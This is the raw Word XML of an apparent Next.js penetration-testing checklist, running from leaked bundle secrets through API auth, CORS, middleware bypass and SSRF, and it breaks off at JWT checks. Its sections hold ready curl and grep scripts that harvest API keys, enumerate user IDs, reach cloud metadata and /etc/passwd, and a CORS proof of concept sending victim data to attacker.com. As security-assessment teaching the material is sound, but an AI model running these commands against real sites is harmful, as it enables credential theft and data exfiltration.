    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">User objects with PII, token/key fields, internal service responses, admin status flags, unreleased feature data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 NEXT_PUBLIC_ Environment Variable Secrets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="C0392B" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">  SEVERITY: CRITICAL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Any environment variable prefixed NEXT_PUBLIC_ is inlined into the client-side JavaScript bundle at build time. This is by design for public config. The vulnerability occurs when developers mistakenly prefix secrets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="12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Secrets inlined in JS bundles are accessible to anyone who visits the site. Unlike backend API calls that can be revoked, these keys are baked into the static files, often cached in CDNs, and may persist even after rotation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A56DB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Common mistakes observed</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NEXT_PUBLIC_STRIPE_SECRET_KEY=sk_live_...        # Stripe secret (should be sk_ not pk_)</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NEXT_PUBLIC_SENDGRID_API_KEY=SG.xxxx             # Email provider key</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NEXT_PUBLIC_AWS_SECRET_ACCESS_KEY=xxxx           # AWS IAM secret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NEXT_PUBLIC_JWT_SECRET=mysecretkey               # JWT signing secret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NEXT_PUBLIC_DATABASE_URL=postgres://...          # DB connection string</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NEXT_PUBLIC_INTERNAL_API_KEY=xxxx                # Internal service auth</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1: Download all JS chunk files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 |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grep -oP '/_next/static/chunks/[^"]+\.js' |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sort -u &gt; chunks.txt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while read chunk; do</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curl -s "https://target.com$chunk" &gt;&gt; all-bundles.js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done &lt; chunks.txt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2: Grep for secret patterns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grep -oP "(sk_live_|sk_test_|pk_live_|rk_live_)[a-zA-Z0-9]{20,}" all-bundles.js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grep -oP "AKIA[0-9A-Z]{16}" all-bundles.js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grep -oP "ghp_[a-zA-Z0-9]{36}" all-bundles.js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grep -oP "SG\.[a-zA-Z0-9]{22}\.[a-zA-Z0-9]{43}" all-bundles.js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grep -oP "(?i)(secret|password|passwd|apikey|api_key|token|private)[\s:=\"']+[a-zA-Z0-9/+]{8,}" all-bundles.js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grep -oP "-----BEGIN (RSA |EC |OPENSSH )?PRIVATE KEY-----" all-bundles.js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3: Check for exposed env var names (reveals var names even if value is redacted)</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grep -oP "process\.env\.[A-Z_]+" all-bundles.js | sort -u</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.3 Source Map Exposure in Production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="D68910" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">  SEVERITY: HIGH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When productionBrowserSourceMaps: true is set in next.config.js, Next.js generates .map files alongside every JS bundle. These map files contain the full original source code including all server-side logic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="12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Source maps expose: server-side business logic, database query patterns, authentication implementation details, hardcoded strings and keys, internal API endpoint structures, and the entire unminified codebase — making all other attacks much easier.</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Check if a known chunk has a source map</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https://target.com/_next/static/chunks/pages/index-[hash].js.map</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HTTP 200 = source maps are exposed</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Download and extract original source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https://target.com/_next/static/chunks/pages/index-HASH.js.map |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python3 -c "import sys,json; d=json.load(sys.stdin); [print(s) for s in d['sources']]"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Search source map content for secrets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https://target.com/_next/static/chunks/CHUNK.js.map |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python3 -c "import sys,json; d=json.load(sys.stdin); print(d['sourcesContent'][0][:5000])"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4 Exposed Build Artifacts and Config Files</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="D68910" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">  SEVERITY: HIGH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Misconfigured deployments or CDN rules can expose raw Next.js build output, config files, and .env files that should never be publicly accessible.</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Always check these — they should all return 404</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for path in ".env" ".env.local" ".env.production" ".env.development" ".env.staging"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"package.json" "package-lock.json" "yarn.lock"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"_next/server/pages-manifest.json" "_next/server/middleware-manifest.json"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"_next/routes-manifest.json" "_next/server/font-manifest.json"; do</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code=$(curl -sI "https://target.com/$path" -o /dev/null -w "%{http_code}")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echo "$code  /$path"</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done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Check if .next directory is web-accessible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https://target.com/.next/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Check for git repository exposure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https://target.com/.git/HEAD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A56DB" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 3 — API Route Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 API Route Missing Authentication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="D68910" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">  SEVERITY: HIGH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In many Next.js apps, authentication is enforced by middleware protecting page routes. However, API routes at /api/* often perform their own auth — or forget to. Since middleware can be bypassed or simply doesn't protect /api/* paths, these routes must be tested independently.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="12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Unauthenticated access to API routes can lead to: user data enumeration, unauthorized mutations, privilege escalation, IDOR (insecure direct object reference), and full data exfiltration.</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every API route with no authentication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while read route; do</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for method in GET POST PUT PATCH DELETE; do</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code=$(curl -s -o /dev/null -w "%{http_code}" -X "$method" "https://target.com$route")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 "$code" != "401" ] &amp;&amp; [ "$code" != "403" ] &amp;&amp; echo "$method $route -&gt; $code"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done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done &lt; api-routes.txt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with expired/invalid JWT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https://target.com/api/user/profile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"Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJ1c2VySWQiOiIxMjMifQ.INVALIDSIG"</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with another user's token (if you have two test accounts)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https://target.com/api/user/123/data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"Cookie: session=USER_B_SESSION_TOKEN"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Should return 403, not user 123's data</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IDOR: enumerate user IDs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for i in $(seq 1 100); do</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code=$(curl -s -o /dev/null -w "%{http_code}" https://target.com/api/users/$i)</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 "$code" = "200" ] &amp;&amp; echo "IDOR: /api/users/$i -&gt; 200"</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done</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 HTTP Method Not Restricted</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="D68910" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">  SEVERITY: HIGH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Next.js API route handlers that don't explicitly check the HTTP method will execute on any method. A read-only endpoint that only expects GET may also accept POST, PUT, or DELETE — triggering unintended behavior.</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all HTTP methods on every API endpoint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for method in GET POST PUT PATCH DELETE HEAD OPTIONS TRACE; do</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response=$(curl -s -o /dev/null -w "%{http_code}"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-X "$method" "https://target.com/api/TARGET-ENDPOINT")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echo "$method -&gt; $response"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done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Interesting responses to investigate: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200 on DELETE when it should return 405</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200 on PUT when no update functionality is shown in UI</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Different response bodies between GET and POST</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 CORS Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="D68910" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">  SEVERITY: HIGH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Cross-Origin Resource Sharing headers on API routes control which origins can make credentialed requests. Overly broad or improperly configured CORS headers allow malicious websites to read API responses from a victim's browser.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="12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A CORS misconfiguration combined with a victim visiting a malicious page allows the attacker to exfiltrate the victim's data from the target API — without any tokens, since the browser sends credentials automatically.</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1: Check if origin is reflected</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-I https://target.com/api/user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"Origin: https://evil.com" | grep -i "access-control"</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BAD: Access-Control-Allow-Origin: https://evil.com</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2: Wildcard + credentials (impossible in spec, but misconfigured servers)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-I https://target.com/api/user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"Origin: https://evil.com" |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grep -i "allow-credentials\|allow-origin"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3: Null origin bypass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-I https://target.com/api/user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"Origin: null" | grep -i "access-control"</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4: Subdomain trust abuse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-I https://target.com/api/user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"Origin: https://evil.target.com" | grep -i "access-control"</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What a vulnerable CORS PoC looks like (report this JS):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fetch("https://target.com/api/user", {credentials: "include"})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.then(r =&gt; r.json())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.then(d =&gt; fetch("https://attacker.com/steal?d=" + JSON.stringify(d)))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4 Server Actions Enumeration and Abuse (Next.js 13+ App Router)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="2471A3" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">  SEVERITY: MEDIUM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Server Actions in the App Router are server-side functions invoked via POST requests. They are assigned an ID at build time, and that ID is embedded in the HTML. Attackers can enumerate these IDs and call actions directly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="12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Server Actions may not validate callers the same way API routes do. They can expose: admin-only mutations, form processing without CSRF protection, internal business logic, file uploads, and data modifications.</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1: Find action IDs in page source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https://target.com/target-page | grep -oP '(?&lt;=data-action=")[^"]+'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https://target.com/target-page | grep -oP '(?&lt;="Next-Action: ")[a-f0-9]+'</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2: Extract from JS bundles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grep -oP 'registerServerReference[^,]+,[^,]+' all-bundles.js | head -20</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3: Invoke an action directly</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-X POST https://target.com/target-page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"Next-Action: ACTION_ID_FROM_SOURCE"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"Content-Type: application/x-www-form-urlencoded"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-b "session=YOUR_COOKIE"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-d "1=\"payload\""</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4: Try invoking with another user's session or no session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-X POST https://target.com/admin-page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"Next-Action: ADMIN_ACTION_ID"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"Content-Type: application/x-www-form-urlencoded"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-d "1=\"test\""</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A56DB" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 4 — Routing &amp; Middleware Bypass</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1 Middleware Matcher Configuration Gaps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="D68910" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">  SEVERITY: HIGH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The middleware.ts matcher config specifies which paths trigger middleware. Incomplete patterns leave subroutes unprotected.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="12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If the matcher only protects /dashboard instead of /dashboard/:path*, then /dashboard/settings, /dashboard/admin, and /dashboard/api/* are all accessible without authentication.</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For every protected route, test all variants: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BASE="/admin"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for variant in "$BASE/" "$BASE/." "$BASE/settings" "$BASE/users"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"$(echo $BASE | tr a-z A-Z)"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"$(python3 -c "import urllib.parse; print(urllib.parse.quote('$BASE'))")"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"$BASE%2f" "$BASE%2F" "/$BASE" "/$BASE/test"; do</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code=$(curl -sI "https://target.com$variant" -o /dev/null -w "%{http_code}")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 "$code" != "302" ] &amp;&amp; [ "$code" != "401" ] &amp;&amp; echo "BYPASS: $variant -&gt; $code"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done</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 Catch-All Route Auth Bypass</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="D68910" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">  SEVERITY: HIGH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Pages like /pages/[...slug].js or App Router equivalents match any path. Middleware that checks for specific strings (exact match) may not catch variants of the same path that resolve to the same page.</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Path confusion variants to test for every protected path:</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"https://target.com/admin"           # baseline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"https://target.com/admin/"          # trailing slash</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"https://target.com/ADMIN"           # uppercase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"https://target.com/%61dmin"         # URL-encoded "a"</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"https://target.com/./admin"         # dot prefix</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"https://target.com/admin/."         # dot suffix</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"https://target.com//admin"          # double slash</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"https://target.com/admin%0a"        # newline injection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"https://target.com/admin;foo"       # semicolon</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3 Rewrite and Redirect Rule Bypass</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="D68910" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">  SEVERITY: HIGH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next.config.js rewrites and redirects block or reroute certain paths. These rules are processed before routing but after the URL is parsed, creating discrepancies between what the rule sees and what Next.js routes.</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Fetch next.config.js if exposed or find via source maps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https://target.com/next.config.js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For each blocked pattern in rewrites/redirects, test variants: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If rule blocks: source: "/api/internal/:path*"</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https://target.com/api/internal/users     # blocked baseline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"https://target.com/api/internal%2fusers" # encoded slash</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https://target.com/api//internal/users    # double slash</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"https://target.com/api/Internal/users"   # case change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"https://target.com/api/internal/users?"  # empty query</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"https://target.com/api/internal/../internal/users" # traversal</w:t>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5 — Server-Side Request Forgery (SSRF)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 _next/image SSRF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="D68910" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">  SEVERITY: HIGH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The built-in Next.js Image Optimization API at /_next/image?url=&amp;w=&amp;q= proxies and transforms external images. If the remotePatterns config is too broad (e.g., hostname: "*") or absent, attackers can use it to probe internal services.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="12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The request originates from the server's network context, allowing access to: AWS EC2 metadata (169.254.169.254), GCP metadata (metadata.google.internal), internal services on private IP ranges, and other internal HTTP services.</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1: AWS EC2 metadata</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"https://target.com/_next/image?url=http://169.254.169.254/latest/meta-data/&amp;w=32&amp;q=75"</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2: GCP metadata</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"https://target.com/_next/image?url=http://metadata.google.internal/computeMetadata/v1/&amp;w=32&amp;q=75"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"Metadata-Flavor: Google"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3: Internal service probe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for port in 22 80 443 3000 3306 5432 6379 8080 8443 9200 27017; do</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code=$(curl -sI "https://target.com/_next/image?url=http://localhost:$port/&amp;w=32&amp;q=75"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-o /dev/null -w "%{http_code}")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echo "Port $port: $code"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done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4: file:// handler (rare but check)</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"https://target.com/_next/image?url=file:///etc/passwd&amp;w=32&amp;q=75"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2 getServerSideProps / SSR Fetch SSRF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="D68910" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">  SEVERITY: HIGH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If server-side rendering functions construct fetch URLs using user-controlled query parameters, path segments, or cookies, they may be exploitable for SSRF.</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Identify pages that accept query params and make server-side requests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Look for patterns like: /product?id=123, /blog?slug=foo, /embed?url=...</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path traversal in resource identifiers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"https://target.com/api/proxy?url=http://169.254.169.254/latest/meta-data/"</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"https://target.com/page?source=http://internal-service/"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redirect-based SSRF (server follows redirects)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Host a redirect: HTTP 302 to http://169.254.169.254/...</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Then: curl -s "https://target.com/api/fetch?url=https://your-server.com/redirect"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Blind SSRF detection: use interactsh or Burp Collaborator</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"https://target.com/api/preview?url=https://YOUR.interactsh.com/ssrf-test"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Check your interactsh dashboard for an incoming DNS/HTTP request</w:t>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6 — Authentication &amp; Session Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1 JWT Verified Only in Middleware (Not in API Routes)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="D68910" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">  SEVERITY: HIGH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A common Next.js pattern: the middleware verifies a JWT to protect page routes, but individual API route handlers trust the session cookie without re-verifying the JWT signature on the server side.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
